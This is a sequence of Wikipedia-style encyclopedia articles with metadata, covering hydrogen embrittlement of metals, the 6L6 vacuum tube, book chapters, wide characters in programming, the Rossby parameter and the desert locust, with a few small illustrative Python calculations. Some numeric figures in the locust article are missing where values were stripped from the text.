A common case of embrittlement during manufacture is poor arc welding practice, in which hydrogen is released from moisture, such as in the coating of welding electrodes or from damp welding rods. To avoid atomic hydrogen formation in the high-temperature plasma of the arc, welding rods have to be thoroughly dried in an oven at the appropriate temperature and duration before use. Another way to minimize the formation of hydrogen is to use special low-hydrogen electrodes for welding high-strength steels. Apart from arc welding, the most common problems are from chemical or electrochemical processes which, by reduction of hydrogen ions or water, generate hydrogen atoms at the surface, which rapidly dissolve in the metal. One of these chemical reactions involves hydrogen sulfide (H2S) in sulfide stress cracking (SSC), a significant problem for the oil and gas industries. After a manufacturing process or treatment which may cause hydrogen ingress, the component should be baked to remove or immobilize the hydrogen. Prevention Hydrogen embrittlement can be prevented through several methods, all of which are centered on minimizing contact between the metal and hydrogen, particularly during fabrication and the electrolysis of water. Embrittling procedures such as acid pickling should be avoided, as should increased contact with substances such as sulfur and phosphates. If the metal has not yet started to crack, hydrogen embrittlement can be reversed by removing the hydrogen source and causing the hydrogen within the metal to diffuse out through heat treatment. This de-embrittlement process, known as low hydrogen annealing or "baking", is used to overcome the weaknesses of methods such as electroplating which introduce hydrogen to the metal, but is not always entirely effective because a sufficient time and temperature must be reached. Tests such as ASTM F1624 can be used to rapidly identify the minimum baking time (using careful design of experiments, a relatively small number of samples can pinpoint this value). Then the same test can be used as a quality control check to evaluate whether baking was sufficient on a per-batch basis. In the case of welding, pre-heating and post-heating of the metal are often applied to allow the hydrogen to diffuse out before it can cause any damage. This is specifically done with high-strength steels and low alloy steels such as the chromium/molybdenum/vanadium alloys. Due to the time needed to re-combine hydrogen atoms into hydrogen molecules, hydrogen cracking due to welding can occur over 24 hours after the welding operation is completed. Another way of preventing this problem is through materials selection. This builds an inherent resistance to this process and reduces the need for post-processing or constant monitoring for failure. Certain metals or alloys are highly susceptible to this issue, so choosing a material that is minimally affected while retaining the desired properties would also provide an optimal solution. Much research has been done to catalogue the compatibility of certain metals with hydrogen. Tests such as ASTM F1624 can also be used to rank alloys and coatings during materials selection to ensure (for instance) that the threshold of cracking is below the threshold for hydrogen-assisted stress corrosion cracking. Similar tests can also be used during quality control to more effectively qualify materials being produced in a rapid and comparable manner.
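As a rough illustration of why baking times run to many hours, the characteristic one-dimensional diffusion estimate x ≈ √(Dt) can be inverted for time. The effective diffusivity below is an assumed order-of-magnitude value only; real values depend strongly on alloy, microstructure, temperature and hydrogen trapping:

```python
import math

# Assumed effective diffusivity of hydrogen in a hardened steel (m^2/s).
# This is an illustrative order-of-magnitude figure, not a measured value.
D_EFF = 1e-11

def time_to_diffuse(distance_m, diffusivity=D_EFF):
    """Rough time in hours for hydrogen to diffuse a given distance,
    from the characteristic-length relation x ~ sqrt(D * t)."""
    return distance_m ** 2 / diffusivity / 3600.0

for mm in (0.5, 1.0, 2.0):
    print(f"{mm} mm: ~{time_to_diffuse(mm / 1000.0):.0f} h")
```

Even under these toy assumptions, letting hydrogen escape from a millimetre or two of section depth takes tens to hundreds of hours, which is consistent with the need to verify baking schedules experimentally rather than guess them.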
Surface coatings Coatings act as a barrier between the metal substrate and the surrounding environment, hindering the ingress of hydrogen atoms. Various techniques can be used to apply coatings, such as electroplating, chemical conversion coatings, or organic coatings. The choice of coating depends on factors such as the type of metal, the operating environment, and the specific requirements of the application. Electroplating is a commonly used method to deposit a protective layer onto the metal surface. This process involves immersing the metal substrate into an electrolyte solution containing metal ions. By applying an electric current, the metal ions are reduced and form a metallic coating on the substrate. Electroplating can provide an excellent protective layer that enhances corrosion resistance and reduces the susceptibility to hydrogen embrittlement. Chemical conversion coatings are another effective method for surface protection. These coatings are typically formed through chemical reactions between the metal substrate and a chemical solution. The conversion coating chemically reacts with the metal surface, resulting in a thin, tightly adhering protective layer. Examples of conversion coatings include chromate, phosphate, and oxide coatings. These coatings not only provide a barrier against hydrogen diffusion but also enhance the metal's corrosion resistance. Organic coatings, such as paints or polymer coatings, offer additional protection against hydrogen embrittlement. These coatings form a physical barrier between the metal surface and the environment. They provide excellent adhesion, flexibility, and resistance to environmental factors. Organic coatings can be applied through various methods, including spray coating, dip coating, or powder coating. They can be formulated with additives to further enhance their resistance to hydrogen ingress. Thermally sprayed coatings offer several advantages in the context of hydrogen embrittlement prevention. The coating materials used in this process are often composed of materials with excellent resistance to hydrogen diffusion, such as ceramics or cermet alloys. These materials have a low permeability to hydrogen, creating a robust barrier against hydrogen ingress into the metal substrate. Testing Most analytical methods for hydrogen embrittlement involve evaluating the effects of (1) internal hydrogen from production and/or (2) external sources of hydrogen such as cathodic protection. For steels, it is important to test specimens in the lab that are at least as hard (or harder) as the final parts will be. Ideally, specimens should be made of the final material or the nearest possible representative, as fabrication can have a profound impact on resistance to hydrogen-assisted cracking. There are numerous ASTM standards for testing for hydrogen embrittlement: ASTM B577 is the Standard Test Methods for Detection of Cuprous Oxide (Hydrogen Embrittlement Susceptibility) in Copper. The test focuses on hydrogen embrittlement of copper alloys, including a metallographic evaluation (method A), testing in a hydrogen charged chamber followed by metallography (method B), and method C is the same as B but includes a bend test. ASTM B839 is the Standard Test Method for Residual Embrittlement in Metallic Coated, Externally Threaded Articles, Fasteners, and Rod-Inclined Wedge Method. ASTM F519 is the Standard Test Method for Mechanical Hydrogen Embrittlement Evaluation of Plating/Coating Processes and Service Environments. 
There are seven different sample designs, and the two most common tests are (1) the rapid test, the rising step load (RSL) method per ASTM F1624, and (2) the sustained load test, which takes 200 hours. The sustained load test is still included in many legacy standards, but the RSL method is increasingly being adopted due to the speed, repeatability, and quantitative nature of the test. The RSL method provides an accurate ranking of the effect of hydrogen from both internal and external sources. ASTM F1459 is the Standard Test Method for Determination of the Susceptibility of Metallic Materials to Hydrogen Gas Embrittlement (HGE) Test. The test uses a diaphragm loaded with a differential pressure. ASTM G142 is the Standard Test Method for Determination of Susceptibility of Metals to Embrittlement in Hydrogen Containing Environments at High Pressure, High Temperature, or Both. The test uses a cylindrical tensile specimen tested in an enclosure pressurized with hydrogen or helium. ASTM F1624 is the Standard Test Method for Measurement of Hydrogen Embrittlement Threshold in Steel by the Incremental Step Loading Technique. The test uses the incremental step loading (ISL) or rising step load (RSL) method for quantitatively determining the hydrogen embrittlement threshold stress for the onset of hydrogen-induced cracking due to platings and coatings, covering both internal hydrogen embrittlement (IHE) and environmental hydrogen embrittlement (EHE). F1624 provides a rapid, quantitative measure of the effects of hydrogen from both internal and external sources (the latter accomplished by applying a selected voltage in an electrochemical cell). The F1624 test is performed by comparing a standard fast-fracture tensile strength to the fracture strength from a rising step load test in which the load is held for an hour or more at each step. In many cases, it can be performed in 30 hours or less. ASTM F1940 is the Standard Test Method for Process Control Verification to Prevent Hydrogen Embrittlement in Plated or Coated Fasteners. While the title now explicitly includes the word fasteners, F1940 was not originally intended for these purposes. F1940 is based on the F1624 method and is similar to F519, but with different root radius and stress concentration factors. When specimens exhibit a threshold cracking of 75% of the net fracture strength, the plating bath is considered to be 'non-embrittling'. There are many other related standards for hydrogen embrittlement: NACE TM0284-2003 (NACE International) Resistance to Hydrogen-Induced Cracking ISO 11114-4:2005 (ISO) Test methods for selecting metallic materials resistant to hydrogen embrittlement. Notable failures from hydrogen embrittlement In 2013, six months prior to opening, shear bolts in the East Span of the Oakland Bay Bridge failed during testing, after only two weeks of service, with the failure attributed to embrittlement (see details above). In the City of London, 122 Leadenhall Street, generally known as 'the Cheesegrater', suffered from hydrogen embrittlement in steel bolts, with three bolts failing in 2014 and 2015. Most of the 3,000 bolts were replaced at a cost of £6m.
See also Hydrogen analyzer Hydrogen damage Hydrogen piping Hydrogen safety Low hydrogen annealing Nascent hydrogen Oxygen-free copper Stress corrosion cracking White etching cracks Zircotec References External links Resources on hydrogen embrittlement, Cambridge University Hydrogen embrittlement Hydrogen purity plays a critical role A Sandia National Lab technical reference manual. Hydrogen embrittlement, NASA Corrosion Electrochemistry Hydrogen Materials degradation Metalworking
Hydrogen embrittlement
[ "Chemistry", "Materials_science", "Engineering" ]
4,233
[ "Metallurgy", "Materials science", "Corrosion", "Electrochemistry", "Materials degradation" ]
1,063,491
https://en.wikipedia.org/wiki/6L6
6L6 is the designator for a beam power tube introduced by Radio Corporation of America in April 1936 and marketed as a power amplifier for audio frequencies. The 6L6 is a beam tetrode that utilizes the formation of a low-potential space-charge region between the anode and screen grid to return anode secondary emission electrons to the anode, and it offers significant performance improvements over power pentodes. The 6L6 was the first successful beam power tube marketed. In the 21st century, variants of the 6L6 are manufactured and used in some high fidelity audio amplifiers and musical instrument amplifiers. History In the UK, three engineers at EMI (Isaac Shoenberg, Cabot Bull and Sidney Rodda) had developed and filed patents in 1933 and 1934 on an output tetrode that used novel electrode structures to form electron beams, creating a dense space-charge region between the anode and screen grid that returned anode secondary electrons to the anode. The new tube offered improved performance compared to a similar power pentode and was introduced at the Physical and Optical Societies' Exhibition in January 1935 as the Marconi N40. Around one thousand of the N40 output tetrodes were produced, but the MOV (Marconi-Osram Valve) company, under the joint ownership of EMI and GEC, considered the design too difficult to manufacture due to the need for good alignment of the grid wires. As MOV had a design-share agreement with RCA of America, the design was passed to that company. The metal tube technology utilized for the 6L6 had been developed by General Electric and introduced in April 1935, with RCA manufacturing the metal envelope tubes for GE at that time. Some of the advantages of metal tube construction over glass envelope tubes were smaller size, ruggedness, electromagnetic shielding and smaller interelectrode capacitance. The 6L6 incorporated an octal base, which had been introduced with the GE metal tubes. The 6L6 was rated for 3.5 watts screen power dissipation and 24 watts combined plate and screen dissipation. The 6L6 and variants of it became popular for use in public address amplifiers, musical instrument amplifiers, radio frequency applications and audio stages of radio transmitters. The 6L6 family has had one of the longest active lifetimes of any electronic component, more than 80 years. As of 2021, variants of the 6L6 are manufactured in Russia, China, and Slovakia. Variations The voltage and power ratings of the 6L6 series were gradually pushed upwards by such features as thicker plates, grids of larger-diameter wire, grid cooling fins, ultra-black plate coatings and low-loss materials for the base. Variants of the 6L6 included the 6L6G, 6L6GX, 6L6GA, 6L6GAY, 6L6GB, 5932/6L6WGA and the 6L6GC. All variants after the original 6L6 utilized glass envelopes. A "W" in the descriptor identified the tube as designed to withstand greater vibration and impact. A "Y" in the descriptor indicated that the insulating material of the base was Micanol. Application The high transconductance and high plate resistance of the 6L6 require circuit design that incorporates topologies and components that smooth out the frequency response, suppress voltage transients and prevent spurious oscillation.
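As a back-of-envelope illustration of designing around the ratings quoted above (3.5 W screen, 24 W combined plate and screen for the original 6L6), the sketch below checks a hypothetical bias point; the operating voltages and currents are invented for illustration, not datasheet values:

```python
# Dissipation limits quoted above for the original metal 6L6.
PLATE_PLUS_SCREEN_MAX_W = 24.0
SCREEN_MAX_W = 3.5

def check_bias(plate_v, plate_ma, screen_v, screen_ma):
    """Return (plate W, screen W, within-ratings?) for a quiescent bias point."""
    plate_w = plate_v * plate_ma / 1000.0
    screen_w = screen_v * screen_ma / 1000.0
    ok = screen_w <= SCREEN_MAX_W and (plate_w + screen_w) <= PLATE_PLUS_SCREEN_MAX_W
    return plate_w, screen_w, ok

# Hypothetical operating point: 350 V / 54 mA plate, 250 V / 5 mA screen.
p, s, ok = check_bias(350, 54, 250, 5)
print(f"plate {p:.1f} W, screen {s:.1f} W -> {'within' if ok else 'exceeds'} ratings")
```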
Characteristics Improved substitute 5881 Similar tubes 6P3S (6П3С) 6P3S-E (6П3С-E) 7027a 6BG6 See also 6V6 KT66 KT88 6550 6CA7 EL34 List of vacuum tubes References External links TDSL Tube data [6L6] Electron Tube Data sheets: Several 6L6 datasheets from various manufacturers Reviews of 6L6 tubes Vacuum tubes Guitar amplification tubes Telecommunications-related introductions in 1936
6L6
[ "Physics" ]
808
[ "Vacuum tubes", "Vacuum", "Matter" ]
1,063,495
https://en.wikipedia.org/wiki/Chapter%20%28books%29
A chapter (capitula in Latin; sommaires in French) is any of the main thematic divisions within a writing of relative length, such as a book of prose, poetry, or law. A book with chapters (not to be confused with the chapter book) may have multiple chapters that respectively comprise discrete topics or themes. In each case, chapters can be numbered, titled, or both. An example of a chapter that has become well known is "Down the Rabbit-Hole", which is the first chapter from Alice's Adventures in Wonderland. History of chapter titles Many ancient books had neither word divisions nor chapter divisions. In ancient Greek texts, some manuscripts began to add summaries and make them into tables of contents with numbers, but the titles did not appear in the text, only their numbers. Sometime in the fifth century CE, the practice of dividing books into chapters began. Jerome (d. 420) is said to have used the term capitulum to refer to numbered chapter headings and index capitulorum to refer to a table of contents. Augustine did not divide his major works into chapters, but in the early sixth century Eugippius did. Medieval manuscripts often had no titles, only numbers in the text and a few words, often in red, following the number. Chapter structure Many novels of great length have chapters. Non-fiction books, especially those used for reference, almost always have chapters for ease of navigation. In these works, chapters are often subdivided into sections. Larger works with many chapters often group them in several 'parts' as the main subdivision of the book. The chapters of reference works are almost always listed in a table of contents. Novels sometimes use a table of contents, but not always. If chapters are used, they are normally numbered sequentially; they may also have titles, and in a few cases an epigraph or prefatory quotation. In older novels it was a common practice to summarise the content of each chapter in the table of contents and/or at the beginning of the chapter. Unusual numbering schemes In works of fiction, authors sometimes number their chapters eccentrically, often as a metafictional statement. For example: Seiobo There Below by László Krasznahorkai has chapters numbered according to the Fibonacci sequence. The Curious Incident of the Dog in the Night-Time by Mark Haddon has only prime-numbered chapters. At Swim-Two-Birds by Flann O'Brien has only one chapter: the first page is titled Chapter 1, but there are no further chapter divisions. God, A Users' Guide by Seán Moncrieff is chaptered backwards (i.e., the first chapter is chapter 20 and the last is chapter 1). The novel The Running Man by Stephen King also uses a similar chapter numbering scheme. Every novel in the series A Series of Unfortunate Events by Lemony Snicket has thirteen chapters, except the final instalment (The End), which has a fourteenth chapter formatted as its own novel. Mammoth by John Varley has the chapters ordered chronologically from the point of view of a non-time-traveler, but, as most of the characters travel through time, this leads to the chapters defying the conventional order. Ulysses by James Joyce has its 18 chapters labelled as episodes, grouped into three parts.
This is the reason chapters in recent reproductions and translations of works of these periods are often presented as "Book 1", "Book 2" etc. In the early printed era, long works were often published in multiple volumes, such as the Victorian triple decker novel, each divided into numerous chapters. Modern omnibus reprints will often retain the volume divisions. In some cases the chapters will be numbered consecutively all the way through, such that "Book 2" might begin with "Chapter 9", but in other cases the numbering might reset after each part (i.e., "Book 2, Chapter 1"). Even though the practice of dividing novels into separate volumes is rare in modern publishing, many authors still structure their works into "Books" or "Parts" and then subdivide them into chapters. A notable example of this is The Lord of the Rings which consists of six "books", each with a recognizable part of the story, although it is usually published in three volumes. Literature Nicholas Dames: The Chapter: A Segmented History from Antiquity to the Twenty-First Century. Princeton University Press 2023. See also Asterism (typography) Chapter book Chapters and verses of the Bible Index (publishing) Section (typography) Table of contents References Book design Book terminology Components of intellectual works Narrative units
Chapter (books)
[ "Technology", "Engineering" ]
1,000
[ "Components of intellectual works", "Book design", "Design", "Components" ]
1,063,614
https://en.wikipedia.org/wiki/Wide%20character
A wide character is a computer character datatype that generally has a size greater than the traditional 8-bit character. The increased datatype size allows for the use of larger coded character sets. History During the 1960s, mainframe and mini-computer manufacturers began to standardize around the 8-bit byte as their smallest datatype. The 7-bit ASCII character set became the industry standard method for encoding alphanumeric characters for teletype machines and computer terminals. The extra bit was used for parity, to ensure the integrity of data storage and transmission. As a result, the 8-bit byte became the de facto datatype for computer systems storing ASCII characters in memory. Later, computer manufacturers began to make use of the spare bit to extend the ASCII character set beyond its limited set of English alphabet characters. 8-bit extensions such as IBM code page 37, PETSCII and ISO 8859 became commonplace, offering terminal support for Greek, Cyrillic, and many others. However, such extensions were still limited in that they were region-specific and often could not be used in tandem. Special conversion routines had to be used to convert from one character set to another, often resulting in destructive translation when no equivalent character existed in the target set. In 1989, the International Organization for Standardization began work on the Universal Character Set (UCS), a multilingual character set that could be encoded using either a 16-bit (2-byte) or 32-bit (4-byte) value. These larger values required the use of a datatype larger than 8 bits to store the new character values in memory. Thus the term wide character was used to differentiate them from traditional 8-bit character datatypes. Relation to UCS and Unicode A wide character refers to the size of the datatype in memory. It does not state how each value in a character set is defined. Those values are instead defined using character sets, with UCS and Unicode simply being two common character sets that encode more characters than an 8-bit-wide numeric value (256 values in total) would allow. Relation to multibyte characters Just as earlier data transmission systems suffered from the lack of an 8-bit clean data path, modern transmission systems often lack support for 16-bit or 32-bit data paths for character data. This has led to character encoding systems such as UTF-8 that can use multiple bytes to encode a value that is too large for a single 8-bit symbol. The C standard distinguishes multibyte encodings of characters, which use a fixed or variable number of bytes to represent each character (primarily used in source code and external files), from wide characters, which are run-time representations of characters in single objects (typically, greater than 8 bits). Size of a wide character Early adoption of UCS-2 ("Unicode 1.0") led to common use of UTF-16 in a number of platforms, most notably Microsoft Windows, .NET and Java. In these systems, it is common to have a "wide character" (wchar_t in C/C++; char in Java) type of 16 bits. These types do not always map directly to one "character", as surrogate pairs are required to store the full range of Unicode (1996, Unicode 2.0). Unix-like systems generally use a 32-bit wchar_t to fit the 21-bit Unicode code point, as C90 prescribed. The size of a wide character type does not dictate what kind of text encodings a system can process, as conversions are available. (Old conversion code commonly overlooks surrogates, however.)
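A short Python sketch of these trade-offs: the same two-character string occupies different numbers of code units under a multibyte narrow encoding (UTF-8), a 16-bit wide encoding where one character needs a surrogate pair (UTF-16), and a fixed-width 32-bit wide encoding (UTF-32):

```python
# 'A' plus an emoji outside the Basic Multilingual Plane (U+1F600).
s = "A\U0001F600"

print(len(s))                      # 2 code points
print(len(s.encode("utf-8")))      # 5 bytes: 1 + 4 in the multibyte encoding
print(len(s.encode("utf-16-le")))  # 6 bytes: 1 unit + a 2-unit surrogate pair
print(len(s.encode("utf-32-le")))  # 8 bytes: one 32-bit unit per character
```

The UTF-16 result is exactly the case the parenthetical above warns about: code that assumes one 16-bit unit per character miscounts any string containing supplementary-plane characters.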
The historical circumstances of their adoption also decide which types of encoding they prefer. A system influenced by Unicode 1.0, such as Windows, tends to mainly use "wide strings" made out of wide character units. Other systems, such as the Unix-likes, tend to retain the 8-bit "narrow string" convention, using a multibyte encoding (almost universally UTF-8) to handle "wide" characters. Programming specifics C/C++ The C and C++ standard libraries include a number of facilities for dealing with wide characters and strings composed of them. The wide characters are defined using the datatype wchar_t, which in the original C90 standard was defined as "an integral type whose range of values can represent distinct codes for all members of the largest extended character set specified among the supported locales" (ISO 9899:1990 §4.1.5). Both C and C++ introduced fixed-size character types char16_t and char32_t in the 2011 revisions of their respective standards to provide unambiguous representation of 16-bit and 32-bit Unicode transformation formats, leaving wchar_t implementation-defined. The Unicode standard, version 4.0 (aligned with ISO/IEC 10646:2003), says that: "The width of wchar_t is compiler-specific and can be as small as 8 bits. Consequently, programs that need to be portable across any C or C++ compiler should not use wchar_t for storing Unicode text. The wchar_t type is intended for storing compiler-defined wide characters, which may be Unicode characters in some compilers." Python According to Python 2.7's documentation, the language sometimes uses wchar_t as the basis for its character type Py_UNICODE. It depends on whether wchar_t is "compatible with the chosen Python Unicode build variant" on that system. This distinction has been deprecated since Python 3.3, which introduced a flexibly-sized UCS1/2/4 storage for strings and formally aliased Py_UNICODE to wchar_t. Since Python 3.12, the use of wchar_t (i.e. the Py_UNICODE typedef) for Python strings (wstr in the implementation) has been dropped; as before, a "UTF-8 representation is created on demand and cached in the Unicode object." References External links The Unicode Standard, Version 4.0 - online edition C Wide Character Functions @ Java2S Java Unicode Functions @ Java2S Multibyte (3) Man Page @ FreeBSD.org Multibyte and Wide Characters @ Microsoft Developer Network Windows Character Sets @ Microsoft Developer Network Unicode and Character Set Programming Reference @ Microsoft Developer Network Keep multibyte character support simple @ EuroBSDCon, Beograd, September 25, 2016 Character encoding C (programming language) C++
Wide character
[ "Technology" ]
1,336
[ "Natural language and computing", "Character encoding" ]
1,063,654
https://en.wikipedia.org/wiki/Rossby%20parameter
The Rossby parameter (or simply beta, $\beta$) is a number used in geophysics and meteorology which arises due to the meridional variation of the Coriolis force caused by the spherical shape of the Earth. It is important in the generation of Rossby waves. The Rossby parameter is given by $\beta = \frac{\partial f}{\partial y} = \frac{2\omega \cos \varphi}{a}$, where $f$ is the Coriolis parameter, $\varphi$ is the latitude, $\omega$ is the angular speed of the Earth's rotation, and $a$ is the mean radius of the Earth. Although both involve Coriolis effects, the Rossby parameter describes the variation of the effects with latitude (hence the latitudinal derivative), and should not be confused with the Rossby number. See also Beta plane References Atmospheric dynamics
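A minimal sketch of evaluating the formula above, using standard values for the Earth's angular speed and mean radius:

```python
import math

OMEGA = 7.2921e-5  # Earth's angular speed of rotation, rad/s
A = 6.371e6        # mean radius of the Earth, m

def rossby_beta(lat_deg):
    """beta = 2 * omega * cos(latitude) / a, in 1/(m*s)."""
    return 2.0 * OMEGA * math.cos(math.radians(lat_deg)) / A

print(f"{rossby_beta(45.0):.2e}")  # about 1.6e-11 at 45 degrees latitude
```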
Rossby parameter
[ "Chemistry" ]
144
[ "Atmospheric dynamics", "Fluid dynamics" ]
1,063,671
https://en.wikipedia.org/wiki/Desert%20locust
The desert locust (Schistocerca gregaria) is a species of locust, a periodically swarming, short-horned grasshopper in the family Acrididae. They are found primarily in the deserts and dry areas of northern and eastern Africa, Arabia, and southwest Asia. During population surge years, they may extend north into parts of Southern Europe, south into Eastern Africa, and east into northern India. The desert locust shows periodic changes in its body form and can change in response to environmental conditions, over several generations, from a solitary, shorter-winged, highly fecund, non-migratory form to a gregarious, long-winged, and migratory phase in which they may travel long distances into new areas. In some years, they may thus form locust plagues, invading new areas, where they may consume all vegetation including crops, and at other times, they may live unnoticed in small numbers. During plague years, desert locusts can cause widespread damage to crops, as they are highly mobile and feed on large quantities of any kind of green vegetation, including crops, pasture, and fodder. A typical swarm can be made up of 150 million locusts per square kilometre and fly in the direction of the prevailing wind, covering up to 150 km in one day. Even a very small, one-square-kilometre locust swarm can eat the same amount of food in a day as about 35,000 people. As an international transboundary pest that threatens agricultural production and livelihoods in many countries in Africa, the Near East, and southwest Asia, their populations have been routinely monitored through a collaborative effort between countries and the United Nations Food and Agriculture Organization (FAO) Desert Locust Information Service (DLIS), which provides global and national assessments, forecasts, and early warning to affected countries and the international community. The desert locust's migratory nature and capacity for rapid population growth present major challenges for control, particularly in remote semiarid areas, which characterize much of their range. Locusts differ from other grasshoppers in their ability to change from a solitary living form into gregarious, highly mobile, adult swarms and hopper bands, as their numbers and densities increase. They exist in different states known as recessions (with low and intermediate numbers), rising to local outbreaks and regional upsurges with increasingly high densities, to plagues consisting of numerous swarms. They have two to five generations per year. The desert locust risk increases with a one-to-two-year continuum of favourable weather (greater frequency of rains) and habitats that support population increases, leading to upsurges and plagues. The desert locust is potentially the most dangerous of the locust pests because of the ability of swarms to fly rapidly across great distances. The major desert locust upsurge in 2004–05 caused significant crop losses in West Africa and diminished food security in the region. The 2019–2021 upsurge caused similar losses in northeast Africa, the Near East, and southwest Asia. Taxonomy The desert locust is a species of orthopteran in the family Acrididae, subfamily Cyrtacanthacridinae. There are two subspecies: one called Schistocerca gregaria gregaria, the better known and of huge economic importance, located north of the equator, and the other, Schistocerca gregaria flaviventris, which has a smaller range in south-west Africa and is of less economic importance, although outbreaks have been observed in the past.
Description The genus Schistocerca consists of more than 30 species, distributed in Africa, Asia, and North and South America, and many species are difficult to identify due to the presence of variable morphs. It is the only genus within the Cyrtacanthacridinae that occurs in both the New and Old World. Most species have the fastigium deflexed and lack lateral carinae on the pronotum. The hind tibiae have smooth margins with numerous spines, but have no apical spine on the outer margin. The second tarsal segment is half as long as the first. Males in the genus have broad anal cerci and a split subgenital plate. The genus is thought to have originated in Africa and then speciated in the New World after a dispersal event that took place 6 to 7 million years ago. The morphology and colour of Schistocerca gregaria differ depending on whether individuals are solitary (or solitaria morph) or gregarious (or gregaria morph). Morphology - Adults: solitary female 6-9 cm long; male 4.5-6 cm; gregarious female 5-6 cm long; male 4.5-5 cm. Prosternal tubercle straight, blunt and slightly sloping backwards. Male subgenital plate bilobed, cerci flat and blunt. Elytra marked with large irregular spots. Pronotum not crested, narrower and saddle-shaped in the gregarious phase. The eyes are striated. The number of striae increases after each moult. Striations are only clearly visible in solitary individuals. Coloration - Nymph: Solitary nymphs are greenish or pale beige and may go through six instars. Gregarious nymphs are typically yellow, with a black head and pronotum and black lateral stripes on the abdomen, and pass through five instars. First-instar gregarious nymphs are almost entirely black. Adults: Immature solitary adults are sandy, pale grey or beige in colour; this colouration evolves to pale yellow in mature male adults and to pale beige with brown patterns in mature females. Immature gregarious adults are pink/reddish in colour, changing to bright yellow in mature males; in mature females the yellow is less bright, mainly on the upper parts of the body, with the lower parts being more of a pale beige. The hindwings are transparent or light yellow. Lifecycle The lifecycle of the desert locust consists of three stages: the egg, the nymph known as a hopper, and the winged adult. Copulation takes place when a mature male hops onto the back of a mature female and grips her body with his legs. Sperm is transferred from the tip of his abdomen to the tip of hers, where it is stored. The process takes several hours, and one insemination is sufficient for a number of batches of eggs. The female locust then seeks suitable soft soil in which to lay her eggs. The site needs to be at the right temperature and degree of dampness, and in close proximity to other egg-laying females. She probes the soil with her abdomen and digs a hole into which an egg pod containing up to 100 eggs is deposited. The egg pod is a few centimetres long, and its lower end lies several centimetres below the surface of the ground. The eggs are surrounded by foam, and this hardens into a membrane and plugs the hole above the egg pod. The eggs absorb moisture from the surrounding soil. The incubation period before the eggs hatch may be two weeks, or much longer, depending on the temperature. The newly hatched nymph soon begins to feed, and if it is a gregarious individual, is attracted to other hoppers and they group together. As it grows, it needs to moult (shed its exoskeleton). Its hard cuticle splits and its body expands, while the new exoskeleton is still soft.
The stages between moulting are called instars, and the desert locust nymph undergoes five moults before becoming a winged adult. Immature and mature individuals in the gregarious phase form bands that feed, bask, and move as cohesive units, while solitary-phase individuals do not seek conspecifics. After the imaginal moult, the young adult is initially soft with drooping wings, but within a few days, the cuticle hardens and haemolymph is pumped into the wings, stiffening them. Maturation can occur in 2–4 weeks when the food supply and weather conditions are suitable, but may take as long as 6 months when they are less ideal. Males start maturing first and give off an odour that stimulates maturation in the females. On maturing, the insects turn yellow and the abdomens of the females start swelling with developing eggs. Ecology and swarming Desert locusts have a solitary phase and a gregarious phase, a type of polyphenism. Solitary locust nymphs and adults can behave gregariously within a few hours of being placed in a crowded situation, while gregarious locusts need one or more generations to become solitary when reared in isolation. Differences in morphology and behaviour are seen between the two phases. In the solitary phase, the hoppers do not group together into bands but move about independently. Their colouring in the later instars tends to be greenish or brownish to match the colour of their surrounding vegetation. The adults fly at night and are also coloured so as to blend into their surroundings, the immature adults being grey or beige and the mature adults being a pale yellowish colour. In the gregarious phase, the hoppers bunch together, and in the later instars develop a bold colouring with black markings on a yellow background. The immatures are pink, and the mature adults are bright yellow and fly during the day in dense swarms. The change from an innocuous solitary insect to a voracious gregarious one normally follows a period of drought, when rain falls and vegetation flushes occur in major desert locust breeding locations. The population builds up rapidly and the competition for food increases. As hoppers get more crowded, the close physical contact causes the insects' hind legs to bump against one another. This stimulus triggers a cascade of metabolic and behavioural changes that causes the insects to transform from the solitary to the gregarious phase. When the hoppers become gregarious, their colouration changes from largely green to yellow and black, and the adults change from brown to pink (immature) or yellow (mature). Their bodies become shorter, and they give off a pheromone that causes them to be attracted to each other, enhancing hopper band and subsequently swarm formation. The nymphal pheromone is different from the adult one. When exposed to the adult pheromone, hoppers become confused and disoriented, because they can apparently no longer "smell" each other, though the visual and tactile stimuli remain. After a few days, the hopper bands disintegrate and those that escape predation become solitary again. During quiet periods, called recessions, desert locusts are confined to a belt that extends from Mauritania through the Sahara Desert in northern Africa, across the Arabian Peninsula, and into northwest India.
Under optimal ecological and climatic conditions, several successive generations can occur, causing swarms to form and invade countries on all sides of the recession area, as far north as Spain and Russia, as far south as Nigeria and Kenya, and as far east as India and southwest Asia. As many as 60 countries can be affected within an area of , or about 20% of the Earth's land surface. Locust swarms fly with the wind at roughly the speed of the wind. They can cover from in a day, and fly up to about above sea level (the temperature becomes too cold at higher altitudes). Therefore, swarms cannot cross tall mountain ranges such as the Atlas, the Hindu Kush, or the Himalayas. They do not venture into the rain forests of Africa nor into central Europe. However, locust adults and swarms regularly cross the Red Sea between Africa and the Arabian Peninsula, and are even reported to have crossed the Atlantic Ocean from Africa to the Caribbean in 10 days during the 1987–89 plague. A single swarm can cover up to and can contain between (a total of around 50 to 100 billion locusts per swarm, representing on the order of 100,000 to 200,000 tonnes, considering an average mass of 2 g per locust). The locust can live between 3 and 6 months, and a 10- to 16-fold increase in locust numbers occurs from one generation to the next. Impacts of the desert locust Economic impact The desert locust is probably the oldest and most dangerous migratory pest in the world. The scale of the invasions and destruction they cause is due to their exceptionally gregarious nature, their mobility, and the voracity and size of their hopper bands and swarms. Desert locust invasions can be absolutely devastating and have serious repercussions on national and regional food security and on the livelihoods of affected rural communities, particularly the poorest. Added to this damage is the cost of control operations implemented to protect crops, which also helps to stop the spread of the invasion; left unchecked, an invasion could continue for many years and over larger areas. Furthermore, the damage is not limited to crops, but must also include the multiple social and environmental consequences of invasions, which are now better understood and taken into account, even if they are difficult to estimate. Desert locusts consume an estimated equivalent of their body weight (about 2 g) each day in green vegetation. They are polyphagous and feed on leaves, shoots, flowers, fruit, seeds, stems, and bark. Nearly all crops and noncrop plants are eaten, including pearl millet, maize, sorghum, barley, rice, pasture grasses, sugarcane, cotton, fruit trees, date palms, banana plants, vegetables, and weeds. Crop loss from locusts was noted in the Bible and Qur'an; these insects have been documented as contributing to the severity of a number of Ethiopian famines. Since the early 20th century, desert locust plagues occurred in 1926–1934, 1940–1948, 1949–1963, 1967–1969, 1987–1989, 2003–2005, and 2019–2020. In March–October 1915, a plague of locusts stripped Ottoman Palestine of almost all vegetation. The significant crop loss caused by swarming desert locusts exacerbates problems of food shortage, and is a threat to food security. Environmental impact Desert locust control still relies mainly on chemical pesticides. In the event of an invasion, control operations are of such magnitude that the products used can have serious side effects on human health, the environment, non-target organisms and biodiversity. These side effects are increasingly well known. 
